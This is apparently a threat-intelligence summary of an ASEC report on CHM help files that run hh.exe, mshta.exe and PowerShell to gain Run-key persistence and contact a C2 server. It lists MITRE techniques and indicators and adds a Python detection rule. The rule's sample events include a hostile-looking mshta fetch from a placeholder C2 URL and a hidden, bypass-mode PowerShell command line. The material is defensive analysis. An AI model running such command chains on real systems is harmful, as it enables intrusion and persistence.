Tracking the CHM Malware Using EDR – ASEC BLOG

ASEC reports a CHM-based APT technique where threat actors use Compiled HTML Help Files to execute malware via hh.exe, download a PowerShell script, and run it through mshta.exe. The operation culminates in persistence via the Run registry key and C2 communication over HTTP, with EDR visibility and MITRE mappings highlighted. #CHM #shacc.kr

Keypoints

  • CHM-based APT tactic uses Compiled HTML Help Files executed via hh.exe to drop malware.
  • The CHM loader downloads a malicious script from the threat actor’s server and executes PowerShell via mshta.exe.
  • The PowerShell script registers commands in the Run key to maintain persistence and interacts with the threat actor’s C2 server.
  • The attack can be observed in email attachments with a visible EDR process tree showing hh.exe and mshta.exe activity.
  • MITRE ATT&CK mapping includes T1218.001 and T1547, illustrating system binary proxy execution and autorun persistence.
  • EDR provides response options such as terminating processes, collecting files, and isolating infected hosts to block further damage.

MITRE Techniques

  • [T1218.001] System Binary Proxy Execution: Compiled HTML File – CHM/HTML is executed via hh.exe to launch malware. ‘MITRE ATT&CK refers to this technique where a threat actor uses a signed program or a program installed by default on an OS to execute malware as T1218 (System Binary Proxy Execution).’
  • [T1218.004] Mshta – The CHM threat uses mshta.exe to run PowerShell, enabling stealthy execution. ‘The CHM malware discovered by ASEC this time downloads a malicious script … It then runs the script, executing PowerShell through mshta.exe.’
  • [T1059.001] PowerShell – The malicious script ultimately executes PowerShell to perform commands and set up persistence via the Run key. ‘The PowerShell script ultimately executed in Figure 2 registers a command to the registry Run key to perform the commands received from the threat actor’s C&C server and maintain persistence.’
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence by registering a command in the Run key so it is executed at logon. ‘autorun registry Run key registration’ (Figure 6).
  • [T1071.001] Web Protocols – C2 communications over HTTP to the actor’s server. ‘C&C: hxxp://shacc[.]kr/skin/product/1.html’
  • [T1105] Ingress Tool Transfer – The malicious script is downloaded from the threat actor’s server. ‘downloads a malicious script (Figure 2) from the threat actor’s server.’
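The process chain above (hh.exe spawning mshta.exe, which in turn launches PowerShell that writes a Run key) is what an EDR process tree exposes. The following is an added detection example, not code from the ASEC post: it walks constructed, EDR-style process-create and registry-write events and tags the chain with the MITRE IDs listed here. Event fields, PIDs, paths and the placeholder URL are all assumptions made up for the example.

```python
"""Flag the CHM -> hh.exe -> mshta.exe -> PowerShell -> Run-key chain in process/registry events."""
from dataclasses import dataclass


@dataclass
class Event:
    pid: int
    ppid: int
    image: str          # lower-case image basename, e.g. "mshta.exe"
    cmdline: str = ""
    reg_key: str = ""   # non-empty only for registry-write events


RUN_KEY = r"\software\microsoft\windows\currentversion\run"

# Constructed sample telemetry (not taken from the report); one infected chain, one benign sibling.
EVENTS = [
    Event(100, 1, "outlook.exe"),
    Event(200, 100, "hh.exe", r"hh.exe C:\Users\victim\Downloads\invoice.chm"),
    Event(300, 200, "mshta.exe", "mshta.exe http://C2-PLACEHOLDER/skin/product/1.html"),
    Event(400, 300, "powershell.exe", "powershell -w hidden -ep bypass -c <script>"),
    Event(400, 300, "powershell.exe", reg_key=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"),
    Event(500, 100, "winword.exe", r"winword.exe C:\Users\victim\Downloads\report.docx"),
]


def ancestry(pid, procs):
    """Return [self, parent, grandparent, ...] image names for a PID."""
    chain = []
    while pid in procs:
        chain.append(procs[pid].image)
        pid = procs[pid].ppid
    return chain


def detect(events):
    """Return (technique, pid, detail) findings for the CHM loader chain."""
    procs = {}
    for e in events:                       # index process-create events only
        if not e.reg_key and e.pid not in procs:
            procs[e.pid] = e
    findings = []
    for e in events:
        chain = ancestry(e.pid, procs)
        if e.reg_key:                      # T1547.001: PowerShell in the chain writes a Run value
            if RUN_KEY in e.reg_key.lower() and "powershell.exe" in chain:
                findings.append(("T1547.001", e.pid, e.reg_key))
        elif e.image == "mshta.exe" and chain[1:2] == ["hh.exe"]:
            findings.append(("T1218.001/T1218.004", e.pid, e.cmdline))  # hh.exe proxying mshta.exe
        elif e.image == "powershell.exe" and "mshta.exe" in chain[1:]:
            findings.append(("T1059.001", e.pid, e.cmdline))            # PowerShell under mshta.exe
    return findings


if __name__ == "__main__":
    for technique, pid, detail in detect(EVENTS):
        print(f"{technique:22} pid={pid} {detail}")
```

A lone hh.exe opening a help file produces no finding; the rule only fires once mshta.exe appears as its child, which keeps ordinary CHM documentation usage out of the alert stream.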

Indicators of Compromise

  • [Process] hh.exe – observed initiating mshta.exe during CHM execution (process chain)
  • [Process] mshta.exe – invoked to run PowerShell as part of the chain
  • [File hash] 809528921de39530de59e3793d74af98 – CHM.Agent (Trojan), detection name reported by EDR
  • [File hash] 32445d05dd1348bce9b6a395b2f8fbd8 – Backdoor/Powershell.Generic.SC187227, detection name reported by EDR
  • [URL] hxxp://shacc[.]kr/skin/product/1.html – C2 address referenced by the threat
  • [Domain] shacc.kr – C2 domain used in the command and control flow

Read more: https://asec.ahnlab.com/en/50580/